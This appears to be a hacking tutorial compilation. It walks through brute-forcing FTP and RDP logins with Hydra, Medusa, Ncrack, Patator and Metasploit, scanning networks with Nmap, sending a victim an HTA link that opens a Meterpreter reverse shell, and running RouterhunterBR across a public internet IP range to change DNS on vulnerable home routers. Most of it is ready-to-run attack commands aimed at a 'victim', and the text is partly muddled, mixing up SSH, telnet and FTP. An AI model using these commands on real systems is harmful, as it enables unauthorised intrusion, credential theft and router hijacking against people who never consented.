6 Ways to Hack FTP Login Password

In this article, we will learn how to gain control over our victim's PC through SSH Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select FTP in box against Protocol option and give the port number 21 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as FTP, HTTP, SMB and etc.

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.

Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)

msf exploit (ftp_login)>set user_file  /root/Desktop/user.txt

msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

From given below image you can observe that we had successfully grabbed the FTP username and password.

2 Ways to Hack Remote Desktop Password using kali Linux

Remote Desktop run on port 3389 so in order to discover information regarding the RDP we need to execute the following script:

Nmap –sV 192.168.0.100

Xhydra

Open your Kali Linux terminal and Type xhydra and press enter

In the target tab, select

Single Target: 192.168.0.100

Protocol: rdp

In passwords tab, select

Username: Type Victim user name

In the passwords, select the password list option and browse to select your Passwords file. Here I have used my custom password file.

Now select start tab and click on start button, the password cracking begins and result is as follows

Hydra

Open kali linux terminal Run the following command

 hydra -l raj -P /root/Desktop/pass.txt 192.168.0.100 rdp

·         -l indicates a single username (use -L for a username list)

·         -P indicates use the following password list

·         ^USER^ tells Hydra to use the username or list in the field

After a few minutes, Hydra hack the password

To connect to victim using remote desktop, we can use rdesktop program 

rdesktop -u -p  

Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning.

Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

·         Open: This indicates that an application is listening for connections on this port.

·         Closed: This indicates that the probes were received but there is no application listening on this port.

·         Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.

·         Unfiltered: This indicates that the probes were received but a state could not be established.

·         Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.

·         Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open kali linux terminal and type nmap to serach all nmap commands

Find All Connected PC (Ping Scan)

The -Sp option for a ping only scan. It will be more useful when you have a group of IP addresses and you don’t know which one is reachable.

nmap -sP -T4 192.168.0.1/24

Note:

-T : Used to change speed of scan. Slow scan yields Better results

Multiple IP Scan

nmap -sn 192.168.0.1/24

TCP Ports Scan

TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports in Remote PC.

Sinlge IP Scan

nmap -sT 192.168.0.102

Multiple IP Scan

nmap -sT 192.168.0.1/24

Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102

Multiple Hosts Scanning

nmap -sV -T4 192.168.0.1/24

Detect Operating System

In this scan you can find the Installed Operating System in the Network PC.

Single Host Scanning

nmap -O 192.168.0.102

Multiple Hosts Scanning

nmap -O -T4 192.168.0.1/24

Detect Protocol

In this scan you can find the PROTOCOL, STATE, SERVICE in the Network PC.

nmap -sO -T4 192.168.0.1/24

Aggressive Scan (Also Work for Trace route)

For Single Host

The aggressive scan selects most commonly used options  it is simple alternative to writing long strings. It will also work for traceroute, etc.

nmap -A 192.168.0.102

Multiple Hosts Scanning

nmap -A -T4 192.168.0.1/24

UDP Ping Scan

The UDP scan only on udp ping scans on the target. . It will show you all open UDP ports in Remote PC.

nmap -sU -T4 192.168.0.102

Syn Scan

Complete 2 step in 3 way handshake. No chance of closing or crashing target. Undetected by older System. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap –sS 192.168.0.113

Exploit Remote Windows PC using HTA Attack with Net Tools

open your kali Linux terminal and type the following command

 git clone git://git.code.sf.net/p/netoolsh/opensource-kali netoolsh-opensource-kali

Open terminal and type ./netool.sh and press enter to continue

Now it will ask you for your choice press 8 now a pop up will open click on yes

You can see lots of attacking option choose 4 Powershell (Relik)

Now a pop up will open choose a powershell payload (powershell.hta) then click OK.

again a pop up will open Enter IP address of your kali Linux pc And click OK.

Now it will ask for port no. Enter the port no.  Such as 4444 and click OK.

Entering the Target IP Address and click and press enter

Click on yes to start a Listner

Now it will execute TCP handler on 192.168.0.103 and start the payload handler.

When Victim Machine browsing to your link  it will download launcher.hta file when victim click on it you will get the meterpreter session .

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt

Find the Vulnerable Router on Internet using RouterhunterBR

The RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The script explores four vulnerabilities in routers

01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35995/

02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit

reference: http://www.exploit-db.com/exploits/35917/

03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit

reference: http://www.exploit-db.com/exploits/36014/

04 - D-Link DSL-2640B Unauthenticated Remote DNS Change Exploitx

reference: http://1337day.com/exploit/23302/

Open your kali Linux terminal and type the following command

./routerhunter.py  --range ‘182.75.*.*’ --dns1  8.8.8.8 --dns2 8.8.4.8

Legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal.

It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.